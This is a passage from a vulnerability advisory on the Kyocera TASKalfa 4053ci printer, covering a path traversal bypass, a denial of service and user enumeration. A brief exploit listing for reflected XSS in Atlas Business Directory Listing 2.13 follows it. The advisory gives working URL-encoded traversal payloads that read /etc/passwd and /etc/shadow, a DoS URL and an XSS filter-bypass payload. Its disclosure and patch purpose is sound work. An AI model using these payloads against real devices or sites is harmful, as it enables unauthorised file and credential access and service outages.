A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.  
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561  
Kyocera has fixed the vulnerability. It was not possible to access arbitrary  
files using the public exploit. However, SEC Consult have found a bypass to  
exploit this vulnerability again and access arbitrary files. Due to the fact  
that the web service is running as the user root, it was possible to access all  
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
The denial-of-service vulnerability is related to the path traversal  
vulnerability. Instead of requesting a file, a directory will be requested.  
Once the request is sent to the web service running on TCP port 443, the web  
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)  
The login function on the web service running on TCP port 443 is prone to a  
user enumeration vulnerability. The login function will return different  
responses, whether the username is valid or not.

Proof of concept:  
-----------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
Previously, a security researcher has discovered an unauthenticated directory  
traversal vulnerability in the web service running on port 443. The following  
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to  
access arbitrary files using the above payload. However, the vulnerability was  
not fixed correctly. SEC Consult identified a bypass to exploit this  
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix  
and access arbitrary files. The following payload can be used to access the  
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen  
in the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 770  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false  
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can  
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in  
the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 401  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::  
daemon:*:11029::::::  
bin:*:11029::::::  
sys:*:11029::::::  
sync:*:11029::::::  
games:*:11029::::::  
man:*:11029::::::  
lp:*:11029::::::  
mail:*:11029::::::  
news:*:11029::::::  
uucp:*:11029::::::  
proxy:*:11029::::::  
www-data:*:11029::::::  
backup:*:11029::::::  
list:*:11029::::::  
irc:*:11029::::::  
gnats:*:11029::::::  
nobody:*:11029::::::  
sshd:x:11029::::::  
-------------------------------------------------------------------------------  
As the web service is running as the user root it was possible to access the  
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that  
the service is running as the user root.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become  
unresponsive.

This attack is related to the path traversal vulnerability. The difference is  
that in this case a folder is requested instead of a file. Apparently, this  
leads to an error condition in the web server causing it to be unresponsive for  
all users. Other applications offering a web interface (e.g., on port 8083)  
seem to not be affected by the attack.

3) User Enumeration (CVE-2023-34261)  
The user enumeration is located in the login functionality of the web  
interface. Submitting an existing username will result in a different server  
response than submitting an incorrect username. This enables attackers to  
enumerate existing users by submitting potential usernames till a different  
response is gathered. In this case, it does not matter whether the transmitted  
password is correct or not. The gathered information could be used to better  
search for default passwords or custom passwords inside of public password  
leaks.  
In case, the username does not exist, the response will return  
"Login-Benutzername oder Passwort falsch.", on the other hand, if the  
username exists the response contains "Sie können sich nicht einloggen."

Vulnerable / tested versions:  
-----------------------------  
The following product has been tested:  
* Kyocera TASKalfa 4053ci

All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.

Vendor contact timeline:  
------------------------  
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT  
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html  
             (it seems only the Japanese website shows the email information)  
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp  
2023-03-02: Contacting the vendor again, due to no response.  
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.  
2023-03-13: Sending security advisory PGP-encrypted.  
2023-04-19: Vendor response, vulnerabilities confirmed.  
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be  
             released on 2023-05-26.  
2023-05-22: Informing vendor that we will request CVE numbers, asking for  
             information about affected & fixed version numbers.  
2023-05-24: Vendor provides version information.  
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.  
2023-06-05: Vendor provides download information.  
2023-07-05: Public release of security advisory.

Solution:  
---------  
The vendor provided the following download information:

There are two ways to update the firmware of our products.  
* One is to contact the shop of purchase and update the firmware from a service person.  
* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions  
   Global website in your country, you can download this tool and latest firmware.  
   Then you update the firmware yourself.  
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Michlits, G. Jank / @2023

Kyocera TASKalfa 4053ci 2VG_S000.002.561 Path Traversal / Denial Of Service

Atlas Business Directory Listing version 2.13 suffers from cross site scripting vulnerabilities.

    # Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/atlas/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /atlas/home/filter_listingsGET parameter 'price-range' is vulnerable to XSShttps://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=openPath: /atlas/home/searchGET parameter 'search_string' is vulnerable to XSShttps://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : "><script>alert(1)</script>[-] Done

Tag

#ssh